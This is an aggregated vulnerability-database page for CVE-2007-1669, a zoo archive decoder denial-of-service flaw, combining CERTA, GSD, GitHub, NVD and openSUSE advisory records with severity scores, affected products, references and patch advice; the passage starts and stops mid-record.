  "content": "## Description\n\nUne vuln\u00e9rabilit\u00e9 dans la gestion des archives au format zoo peut\nconduire \u00e0 une boucle infinie et la consommation de toute la ressource\nprocesseur. Elle permet \u00e0 un utilisateur malveillant de r\u00e9aliser un d\u00e9ni\nde service \u00e0 distance.\n\n## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 des \u00e9diteurs pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n\nPour Avast!, migrer en version 4.7.981 ou ult\u00e9rieure.\n\nPour Avira, migrer la biblioth\u00e8que avpack32.dll en version 7.3.0.6. La\nsoci\u00e9t\u00e9 annonce avoir corrig\u00e9 la vuln\u00e9rabilit\u00e9 de 22 mars 2007.\n\nPour Barracuda, migrer en firmware 3.4 ou ult\u00e9rieur et en version de\nd\u00e9finition de virus 2.0.6399 ou ult\u00e9rieure.\n\nPour Panda, la soci\u00e9t\u00e9 annonce que la mise \u00e0 jour corrigeant la\nvuln\u00e9rabilit\u00e9 est automatique. Le correctif date du 02 avril 2007.\n",
  "cves": [
    {
      "name": "CVE-2007-1671",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1671"
    },
    {
      "name": "CVE-2007-1672",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1672"
    },
    {
      "name": "CVE-2007-1669",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1669"
    },
    {
      "name": "CVE-2007-1670",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1670"
    }
  ],
  "links": [
    {
      "title": "Bulletin de version Avast du 30    avril 2007 :",
      "url": "http://www.avast.com/eng/avast-4-home_pro-revision-history.html"
    },
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Barracuda    du 04 mai 2007 :",
      "url": "http://www.barracudanetworks.com/ns/resources/tech_alert.php"
    }
  ],
  "reference": "CERTA-2007-AVI-212",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2007-05-09T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 dans la gestion des archives au format zoo permet \u00e0 un\nutilisateur malveillant de r\u00e9aliser un d\u00e9ni de service \u00e0 distance.\n",
  "title": "Vuln\u00e9rabilit\u00e9 de plusieurs produits de s\u00e9curit\u00e9",
  "vendor_advisories": []
}

GSD-2007-1669

Vulnerability from gsd - Updated: 2023-12-13 01:21

Details

Aliases

CVE-2007-1669

Aliases

CVE-2007-1669

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2007-1669",
    "description": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
    "id": "GSD-2007-1669",
    "references": [
      "https://www.suse.com/security/cve/CVE-2007-1669.html"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2007-1669"
      ],
      "details": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
      "id": "GSD-2007-1669",
      "modified": "2023-12-13T01:21:40.299402Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2007-1669",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://www.amavis.org/security/asa-2007-2.txt",
            "refsource": "CONFIRM",
            "url": "http://www.amavis.org/security/asa-2007-2.txt"
          },
          {
            "name": "multiple-vendor-zoo-dos(34080)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
          },
          {
            "name": "ADV-2007-1699",
            "refsource": "VUPEN",
            "url": "http://www.vupen.com/english/advisories/2007/1699"
          },
          {
            "name": "23823",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/23823"
          },
          {
            "name": "20070724 zoo - amavis - barracuda cross-ref problems",
            "refsource": "VIM",
            "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
          },
          {
            "name": "25315",
            "refsource": "SECUNIA",
            "url": "http://secunia.com/advisories/25315"
          },
          {
            "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
            "refsource": "BUGTRAQ",
            "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
          },
          {
            "name": "25122",
            "refsource": "SECUNIA",
            "url": "http://secunia.com/advisories/25122"
          },
          {
            "name": "2680",
            "refsource": "SREASON",
            "url": "http://securityreason.com/securityalert/2680"
          },
          {
            "name": "35795",
            "refsource": "OSVDB",
            "url": "http://www.osvdb.org/35795"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.4.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-1669"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "NVD-CWE-Other"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "23823",
              "refsource": "BID",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.securityfocus.com/bid/23823"
            },
            {
              "name": "25122",
              "refsource": "SECUNIA",
              "tags": [
                "Patch",
                "Vendor Advisory"
              ],
              "url": "http://secunia.com/advisories/25122"
            },
            {
              "name": "http://www.amavis.org/security/asa-2007-2.txt",
              "refsource": "CONFIRM",
              "tags": [],
              "url": "http://www.amavis.org/security/asa-2007-2.txt"
            },
            {
              "name": "20070724 zoo - amavis - barracuda cross-ref problems",
              "refsource": "VIM",
              "tags": [],
              "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
            },
            {
              "name": "35795",
              "refsource": "OSVDB",
              "tags": [],
              "url": "http://www.osvdb.org/35795"
            },
            {
              "name": "25315",
              "refsource": "SECUNIA",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://secunia.com/advisories/25315"
            },
            {
              "name": "2680",
              "refsource": "SREASON",
              "tags": [],
              "url": "http://securityreason.com/securityalert/2680"
            },
            {
              "name": "ADV-2007-1699",
              "refsource": "VUPEN",
              "tags": [],
              "url": "http://www.vupen.com/english/advisories/2007/1699"
            },
            {
              "name": "multiple-vendor-zoo-dos(34080)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
            },
            {
              "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2018-10-16T16:40Z",
      "publishedDate": "2007-05-09T00:19Z"
    }
  }
}

GHSA-XQXC-R4XH-RX35

Vulnerability from github – Published: 2022-05-01 17:55 – Updated: 2022-05-01 17:55

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2007-1669"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-05-09T00:19:00Z",
    "severity": "HIGH"
  },
  "details": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
  "id": "GHSA-xqxc-r4xh-rx35",
  "modified": "2022-05-01T17:55:55Z",
  "published": "2022-05-01T17:55:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-1669"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/25122"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/25315"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/2680"
    },
    {
      "type": "WEB",
      "url": "http://www.amavis.org/security/asa-2007-2.txt"
    },
    {
      "type": "WEB",
      "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35795"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/23823"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2007/1699"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

FKIE_CVE-2007-1669

Vulnerability from fkie_nvd - Published: 2007-05-09 00:19 - Updated: 2025-04-09 00:30

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://secunia.com/advisories/25122	Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/25315	Vendor Advisory
cve@mitre.org	http://securityreason.com/securityalert/2680
cve@mitre.org	http://www.amavis.org/security/asa-2007-2.txt
cve@mitre.org	http://www.attrition.org/pipermail/vim/2007-July/001725.html
cve@mitre.org	http://www.osvdb.org/35795
cve@mitre.org	http://www.securityfocus.com/archive/1/467646/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/23823	Exploit
cve@mitre.org	http://www.vupen.com/english/advisories/2007/1699
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/34080
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/25122	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/25315	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securityreason.com/securityalert/2680
af854a3a-2127-422b-91ae-364da2661108	http://www.amavis.org/security/asa-2007-2.txt
af854a3a-2127-422b-91ae-364da2661108	http://www.attrition.org/pipermail/vim/2007-July/001725.html
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/35795
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/467646/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/23823	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/1699
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/34080

Impacted products

Vendor	Product	Version
barracuda_networks	barracuda_spam_firewall	3.1.17
barracuda_networks	barracuda_spam_firewall	3.1.18
barracuda_networks	barracuda_spam_firewall	3.3.0.54
barracuda_networks	barracuda_spam_firewall	3.3.01.001
barracuda_networks	barracuda_spam_firewall	3.3.3
barracuda_networks	barracuda_spam_firewall	3.3.03.053
barracuda_networks	barracuda_spam_firewall	3.3.03.055
barracuda_networks	barracuda_spam_firewall	3.3.15.026
barracuda_networks	barracuda_spam_firewall	3.4
amavis	amavis	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A9DC6C5-D228-43AC-8ED1-5A7E5315E275",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "47F9E0B8-8BCF-4259-A415-909FD349DB2A",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*",
              "matchCriteriaId": "159185A2-272C-46EC-A96A-84FB80B6473E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*",
              "matchCriteriaId": "4499AB68-D449-4A36-A243-F13F02C0EF95",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BC3E5FA-1A08-4D4C-865E-547D50E21349",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9E13260-BC29-45D9-98F3-0C2D7CF72A42",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*",
              "matchCriteriaId": "3DB02038-4858-4D43-9FB6-492E131227CA",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*",
              "matchCriteriaId": "FAA3E09E-6F3C-4ED9-AD6C-3F8938A629B2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5A431D3-D4D1-43F0-9D2F-C3D0CB58EA36",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "64AF6FAE-B025-4F70-9F52-C7C12C6F705D",
              "versionEndIncluding": "2.4.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
    },
    {
      "lang": "es",
      "value": "zoo decoder versi\u00f3n 2.10 (zoo-2.10), tal como se utiliza en m\u00faltiples productos, incluyendo (1) Barracuda Spam Firewall versi\u00f3n 3.4 y posterior con virusdef anterior a la versi\u00f3n 2.0.6399, (2) Spam Firewall anterior a la versi\u00f3n 3.4 20070319 con virusdef anterior a 2.0.6399o, y (3) AmaViS versi\u00f3n 2.4.1 y anteriores, permite a atacantes remotos generar una denegaci\u00f3n de servicio (bucle infinito) por medio del componente ZOO Archive con una estructura direntry que apunta hacia un archivo anterior."
    }
  ],
  "id": "CVE-2007-1669",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-05-09T00:19:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25122"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25315"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/2680"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.amavis.org/security/asa-2007-2.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/35795"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/23823"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/1699"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25122"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25315"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/2680"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.amavis.org/security/asa-2007-2.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/35795"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/23823"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/1699"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

OPENSUSE-SU-2024:10445-1

Vulnerability from csaf_opensuse - Published: 2024-06-15 00:00 - Updated: 2024-06-15 00:00

Summary

zoo-2.10-1025.8 on GA media

Notes

Title of the patch

zoo-2.10-1025.8 on GA media

Description of the patch

These are all security issues fixed in the zoo-2.10-1025.8 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2024-10445

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "zoo-2.10-1025.8 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the zoo-2.10-1025.8 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2024-10445",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_10445-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2006-0855 page",
        "url": "https://www.suse.com/security/cve/CVE-2006-0855/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2007-1669 page",
        "url": "https://www.suse.com/security/cve/CVE-2007-1669/"
      }
    ],
    "title": "zoo-2.10-1025.8 on GA media",
    "tracking": {
      "current_release_date": "2024-06-15T00:00:00Z",
      "generator": {
        "date": "2024-06-15T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2024:10445-1",
      "initial_release_date": "2024-06-15T00:00:00Z",
      "revision_history": [
        {
          "date": "2024-06-15T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "zoo-2.10-1025.8.aarch64",
                "product": {
                  "name": "zoo-2.10-1025.8.aarch64",
                  "product_id": "zoo-2.10-1025.8.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "zoo-2.10-1025.8.ppc64le",
                "product": {
                  "name": "zoo-2.10-1025.8.ppc64le",
                  "product_id": "zoo-2.10-1025.8.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "zoo-2.10-1025.8.s390x",
                "product": {
                  "name": "zoo-2.10-1025.8.s390x",
                  "product_id": "zoo-2.10-1025.8.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "zoo-2.10-1025.8.x86_64",
                "product": {
                  "name": "zoo-2.10-1025.8.x86_64",
                  "product_id": "zoo-2.10-1025.8.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "zoo-2.10-1025.8.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:zoo-2.10-1025.8.aarch64"
        },
        "product_reference": "zoo-2.10-1025.8.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "zoo-2.10-1025.8.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:zoo-2.10-1025.8.ppc64le"
        },
        "product_reference": "zoo-2.10-1025.8.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "zoo-2.10-1025.8.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:zoo-2.10-1025.8.s390x"
        },
        "product_reference": "zoo-2.10-1025.8.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "zoo-2.10-1025.8.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:zoo-2.10-1025.8.x86_64"
        },
        "product_reference": "zoo-2.10-1025.8.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2006-0855",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2006-0855"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Stack-based buffer overflow in the fullpath function in misc.c for zoo 2.10 and earlier, as used in products such as Barracuda Spam Firewall, allows user-assisted attackers to execute arbitrary code via a crafted ZOO file that causes the combine function to return a longer string than expected.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:zoo-2.10-1025.8.aarch64",
          "openSUSE Tumbleweed:zoo-2.10-1025.8.ppc64le",
          "openSUSE Tumbleweed:zoo-2.10-1025.8.s390x",
          "openSUSE Tumbleweed:zoo-2.10-1025.8.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2006-0855",
          "url": "https://www.suse.com/security/cve/CVE-2006-0855"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 153057 for CVE-2006-0855",
          "url": "https://bugzilla.suse.com/153057"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:zoo-2.10-1025.8.aarch64",
            "openSUSE Tumbleweed:zoo-2.10-1025.8.ppc64le",
            "openSUSE Tumbleweed:zoo-2.10-1025.8.s390x",
            "openSUSE Tumbleweed:zoo-2.10-1025.8.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
